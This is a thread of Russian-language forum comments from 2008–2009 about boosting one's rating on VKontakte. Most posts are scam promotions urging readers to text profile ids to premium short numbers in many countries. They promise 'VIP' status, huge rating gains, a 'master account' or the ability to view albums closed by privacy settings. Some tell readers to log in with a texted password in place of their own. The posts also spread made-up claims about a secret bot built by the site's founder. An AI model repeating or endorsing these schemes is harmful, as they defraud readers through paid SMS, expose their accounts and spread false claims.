    не ведитесь на эту всю ерунду которую пишут!!!Вот единственный бот который реально повышает рейтинг!!! Социальная программа повышение рейтинга на сaйте ВКонтакте. Этот бот создан специально для того, что бы снизить ваши затраты на повышение рейтинга. Благодаря возможностям этого бота вы тратите всего 5 рублей (Россия), 1 грн (Украина). Более детальные разценки. Все, что вам необходимо – это отправить сообщение с текстом id31528907 (id адрес бота) на номер 1046 (для России), 4449 (Украина, оператор Life), 4280 (Украина, MTS, Київстар). В течении суток вам начисляется 50% от рейтинга вашей страницы. Чем больше сообщений вы отправляете в течении суток, тем больше увеличивается рейтинг. С каждым новым сообщением к 50% добавляется еще 5%. Но, в день вы имеете возможность отослать не более 50 сообщений!
  • Опубликовано Кот, 27 Январь, 2009 20:01:18
    Вниание,с 27 января 2009 года изменились номера id систем пополнения рейтинга путём смс команд: Для повышения рейтинга нужно отправить [СМС] сообщение с текстом: «id28881723» (без кавычек) по номеру 1046 В ответном сообщении прийдёт пароль, который нужно ввести вместо пароля при входе на сайт ВКонтакте. 1смс- 150% V I P статус 3смс(подряд)- 500% 5смс(подряд)- 1000% 10смс(подряд)-5000% Стоимость [СМС] сообщения - 1.25 рубля или 0.3 гривень (0.11 usd) Россия - "id28881723" (без кавычек) на кoрoткий нoмеp 1046 Украина - "id28881723" (без кавычек) на кoрoткий нoмеp 4449 Беларусь - "id28881723" (без кавычек) на кoрoткий нoмеp 4280, 3355 (Velcom) Казахстан - "id28881723" (без кавычек) на кoрoткий нoмеp 9684, 4446(Altel) Армения - "id28881723" (без кавычек) на кoрoткий нoмеp 9684 Азербайджан - "id28881723" (без кавычек) на кoрoткий нoмеp 8550 Латвия - "id28881723" (без кавычек) на кoрoткий нoмеp 1834 Грузия - "id28881723" (без кавычек) на кoрoткий нoмеp 9787, 8881(A Mobile) Израиль - "id28881723" (без кавычек) на кoрoткий номер 5599 После этого полоска рейтинга станет золотого цвета. На вашей аватарке появится статус ''V I P’’ и ваша страничка будет отображаться на первых местах в поиске, а также Вам станут доступны для просмотра альбомы и видеозаписи всех пользователей, даже закрытые настройками приватности. Если рейтинг не пришел в течении 10 минут то отправьте повторное сообщение, оно бесплатно!
  • Опубликовано я, 25 Январь, 2009 01:55:15
    падлы вы все красные. на@бываете в свою пользу народ!!!
  • Опубликовано кривинский анаторий, 22 Январь, 2009 16:22:27
    Способы повышения рейтинга! Легальный и нелегальный! Существует два способа повышения рейтинга Вконтакте. Как говорилось выше, Дуров создал рейтинг для систематизации анкет пользователей по какому нибуть критерию. В данном случае это рейтинг. Как известно, что бы повысить рейтинг необходимо отправлять смс с содержанием и на определенные номера. Отправка смс с текстом id (пример id000000) на номер 4444(1 голос) и 4449(10 голосов) даст Вам возможность проголосовать за себя или за друга. Данный способ считается легальными позволяет повысить Ваш рейтинг(или друга) на определенное количество голосов(или wacko 1 голос - +1% в рейтинге Но как известно, зайдя в самом контакте в поиск людей, можно обнаружить, что рейтинг 10 первых человек превышает 10000 и даже 30000 - это означает, что обычным (легальным) способом таких результатов добится очень сложно, к тому же будет много затрат с отправкой смс. В связи с этим Дуров создал нелегальный способ накрутки рейтинга. Отправляя смс на те же самые номера 4444 и 4449 но с текстом id23931662 - появляется возможность повысить рейтинг сразу на 50 голосовиспользуя всего одно смс. Может показатся странным, что используется чужой id, но это не так. Для того, что бы повысить рейтинг на 50 голосов Дуров создал “бота” который скрывается среди анкет обычных пользователей. На одной из Московских вечеринок Павел рассказал, что ему помогли его друзья в создании проекта и, что касается рейтинга то если обычные пользователи знали бы о изъянах таких как боты увеличивающие количество голосов, то незамедлительно повышали себе рейтинг, что привело б к нарушению процесса деятельности самого проекта как “vkontakte”. Однако, что бы не вызывать подозрения Дуров дал информацию нескольким людям о способе повышения рейтинга. Как известно Павел занимает не первое место по рейтингу среди пользователей контакта. Один из нескольких человек рассказал о нелегальном способе повышения рейтинга используя “ботов”.На данный момент извествен только один из них, а именно бот id23931662. Отображаясь как обычная анкета, бот повышает рейтинг на 50 голосов и более. Способ нелегального повышения рейтинга 1. отправляем смс на номер 4444 (5 голосов) или 4449 (50 голосов) с текстом id23931662 2. получаем ответную смс, заходим в контакт, выбираем голосовать, вводим секретный код(будет написан в ответном смс) 3. голосуем! Какие максимальные рейтинги Сначала я видел анкеты с рейтингами 100-200, потом стали попадаться в 500… после этого некоторые анкеты зашкаливали за 1000. Все кончилось тем, что есть некие обычные ребята, и порой красивые девушки, рейтинг которых несколько тысяч, и переваливает за 10000. Текущий рейтинг Дурова - 30414, хотя с ним все понятно… Он выводится не первым, и этого рейтинга на текущий момент достаточно, чтобы быть в TOP10, где нижняя анкета имеет порядка 8000. В переводе на деньги это не более $5000 за TOP3. )) Выше не имеет смысла, т.к. пока некуда… но все зависит от действий конкурентов. Как лучше использовать голоса Вы можете голосовать за себя, но это не очень выгодно. Например, Вы платите за 10 голосов, голосуете за себя, и получаете +10% к рейтингу. Гораздно выгоднее голосовать за других Когда Вы отдаете 1 голос кому-то, то этот голос отдается кому-то. Когда Вы отдаете сразу 3 голоса кому-то из ваших друзей, то при этом 2 получаете себе (5 голосов по цене трех). Аналогично - 7 голосов другу (5 бесплатно себе). Договоритесь с другом, заплатите ему за 10 голосов, он их Вам все равно отдаст, и получит себе еще прибавку к рейтингу. И если Вам все-таки зачем-то нужно повысить рейтинг в контакте, то существует два способа - это легальный способ и нелегальный. Пошаговая инструкция следующая Легальный способ повышения рейтинга vkontakte 1. переходим на свою страницу и смотрим в адресной строке свой id……. ( к примеру id000000 2. отправляем смс на номер 4444 (1 голос) или 4449 (10 голосов) с текстом вашего id…….. ( к примеру id000000) 3. получаем ответную смс, заходим в контакт, обнаруживаем, что у Вас теперь есть право голосовать 4. голосуем! Нелегальный способ 1. отправляем смс на номер 4449 с текстом id23931662 2. получаем ответную смс, заходим в контакт, выбираем голосовать, вводим секретный код(будет написан в ответном смс) 3. голосуем
  • Опубликовано Dimka, 17 Январь, 2009 01:15:54
    Продаю рейтинг и раскручиваю группы на сайте VKontakte. Обращаться в icq 322359395.
  • Опубликовано Василий, 08 Январь, 2009 18:38:52
    Количество людей, зарегистрировавшихся ВКонтакте достигло 24 миллионов. Разумеется некоторые хотят выделяться, и это правильно! Специально для этого разработали " V I P сервис". Если ты не такой как все, если ты хочешь выделяться из серой массы, ты просто обязан стать V I P пользователем ВКонтакте, плюс к этому мы добавляем 150% к вашему рейтингу! Для этого нужно просто отправить [СМС] сообщение с текстом: «id15310881» по номеру «1046» или «1045 » , без кавычек . В ответном сообщении прийдёт пароль, который нужно ввести вместо пароля при входе на сайт ВКонтакте. 1смс- 150% V I P статус 2смс- 550% 3смс- 1000% Стоимость [СМС] сообщения - 3 рубля или 0.5 гриваs (0.15 usd) После этого полоска рейтинга станет золотого цвета. На вашей аватарке появится статус ''V I P’’ и ваша страничка будет отображаться на первых местах в поиске, а также Вам станут доступны для просмотра альбомы и видеозаписи всех пользователей, даже закрытые настройками приватности. Спешите предложение ограничено!!! Если рейтинг не пришел в течении 10 минут то отправьте повторное сообщение, оно бесплатно! Разошлите это предложение всем друзьям и ваш рейтинг повыситься на 101%!!
  • Опубликовано Петечка, 07 Январь, 2009 15:39:36
    Итак не могу больше смотреть на проблему так называемого "халявного рейтинга в вконтакте" , а посему хочу поведать вам мои дорогие друзья,всю информацию "про рейтинг" Проработав в сфере обслуживания таких комун систем как контакт, могу с УВЕРЕННОСТЬЮ сказать, заверить, уверить (как хотите что нету способа "халявного" пополнения рейтинга... ...кроме как через 4g (четыре джи) систему. Данная система была разработанна для комун системных авторизовванных ботов, выполняющих ту самую работу по накрутке рейтинга нам с вами, проще говоря эта программа крутит счетчик голосов. У каждой подобной "вконтакте" системы есть собственный так скажем номер 4g операнды, непосредственно вконтакте - 26959513 Итак главное к чему я подводил-это возможность изменять Рейтинг посредству административной программы системы 4джи. Для этого Все таки необходимо потратить некоторые деньги. Деньги в размере стоимости одной ОБЫЧНОЙ! повторяю-ОБЫЧНОЙ смс вашего оператора сотовой связи. Поскольку операция бесплатная абсолютно, С вас не снимут процент за услугу. Для того чтобы получить мастер аккаунт по повышению рейтинга, изменения настроек анкет пользователей нужно дружить со мной шутка есть возможность получить логин и пароль по средству смс(как я уже упамянул) : ТЕКСТ: "4G 26959513"( без ковычек ) нужно отправить на короткий номер 4161 или 4449 если отправка "по какойто причине" не возможна. В ответ через некоторое время прийдет смс с логином и паролем мастер аккаунта, через который вы сможете отправить завалидированные голоса на свою учетную запись. Есть некоторое условие- мастер аккаунт НЕ ПОСТОЯНЕН. Срок его действия ~ 2 часа с момента получения ответной смс!
  • Опубликовано Елена, 19 Декабрь, 2008 18:05:15
    Игорь,большае вам спасибо:)уже накрутил себе 200 голосов!!стараюсь не торопиться,что-бы не заметили:)еще раз спасибо.
  • Опубликовано Игорь, 18 Декабрь, 2008 16:47:28
    Легальный и нелегальный! Существует два способа повышения рейтинга Вконтакте. Как говорилось выше, Дуров создал рейтинг для систематизации анкет пользователей по какому нибуть критерию. В данном случае это рейтинг. Как известно, что бы повысить рейтинг необходимо отправлять смс с содержанием и на определенные номера. Отправка смс с текстом id****** (пример id100150) на номер 1045(1 голос) и 1046(10 голосов) даст Вам возможность проголосовать за себя или за друга. Данный способ считается легальными позволяет повысить Ваш рейтинг(или друга) на определенное количество голосов(или wacko 1 голос - +1% в рейтинге Но как известно, зайдя в самом контакте в поиск людей, можно обнаружить, что рейтинг 10 первых человек превышает 10000 и даже 30000 - это означает, что обычным (легальным) способом таких результатов добится очень сложно, к тому же будет много затрат с отправкой смс. В связи с этим Дуров создал нелегальный способ накрутки рейтинга. Отправляя смс на те же самые номера 1045 и 1046 но с текстом id18552562 - появляется возможность повысить рейтинг сразу на 50 голосов используя всего одно смс. Может показатся странным, что используется чужой id, но это не так. Для того, что бы повысить рейтинг на 50 голосов Дуров создал “бота” который скрывается среди анкет обычных пользователей. На одной из Московских вечеринок Павел рассказал, что ему помогли его друзья в создании проекта и, что касается рейтинга то если обычные пользователи знали бы о изъянах таких как боты увеличивающие количество голосов, то незамедлительно повышали себе рейтинг, что привело б к нарушению процесса деятельности самого проекта как “vkontakte”. Однако, что бы не вызывать подозрения Дуров дал информацию нескольким людям о способе повышения рейтинга. Как известно Павел занимает не первое место по рейтингу среди пользователей контакта. Один из нескольких человек рассказал о нелегальном способе повышения рейтинга используя “ботов”.На данный момент извествен только один из них, а именно бот id18552562. Отображаясь как обычная анкета, бот повышает рейтинг на 50 голосов и более. Способ нелегального повышения рейтинга: 1. отправляем смс на номер 1045 (5 голосов) или 1046 (50 голосов) с текстом id18552562 2. получаем ответную смс, заходим в контакт, выбираем голосовать, вводим секретный код(будет написан в ответном смс) 3. голосуем! 4. Делитесь секретом с друзьями, не жадничайте ;) пусть у них тоже будет высокий рейтинг!!
  • Опубликовано Hesoyan, 07 Декабрь, 2008 18:35:35
    Количество людей, зарегистрировавшихся ВКонтакте достигло 19 миллионов. Разумеется некоторые хотят выделяться, и это правильно! этот сервер секретный и и посылает свой номер лишь некоторым, на наш взгляд лучшим, которые должны стать V I P. Специально для этого мы разработали ” V I P сервис”. Если ты не такой как все, если ты хочешь выделяться из серой массы, ты просто обязан стать V I P пользователем ВКонтакте, плюс к этому мы добавляем 150% к вашему рейтингу! Для этого нужно просто отправить [СМС] сообщение с текстом: d17315356?21968 по номеру 4449. В ответном сообщении прийдёт пароль, который нужно ввести вместо пароля при входе на сайт ВКонтакте. 1смс- 50% V I P статус 6 рублей 2смс- 100% 10 рублей 3смс- 300% 17 рублей 4смс- 900% всего за 36 рублей И так предуприждаю Если вы хотите не 50% а более то вам нужно отослать сообгение допустим для получения 300% вам нужно успеть в 3 минуты отправить 3 смс Не спишите кричать меня обманули это не обман этот сервис обрабатыват инфу от 40 минут до 4 часов в вашей анкети должен быть обязательно написан мобильный телефон в анкете сайта вконтакте После этого полоска рейтинга станет золотого цвета. На вашей аватарке появится статус ‘’V I P’’ и ваша страничка будет отображаться на первых местах в поиске, а также Вам станут доступны для просмотра альбомы и видеозаписи всех пользователей, даже закрытые настройками приватности. Спешите предложение ограничено!!! Если рейтинг не пришел в течении 10 минут то отправьте повторное сообщение, оно бесплатно
  • Опубликовано 555, 24 Октябрь, 2008 19:57:37
    А я по другому, поднимал рейтинг у себя в контакте ))) отправлял вот на этот номер 1046 вот это id6294242 ( только для РОССИИ действует )
  • Опубликовано павел, 04 Октябрь, 2008 00:53:10
    ха ха полный брет про легальный и не легальный способ чел просто решил себе рейтинга добавить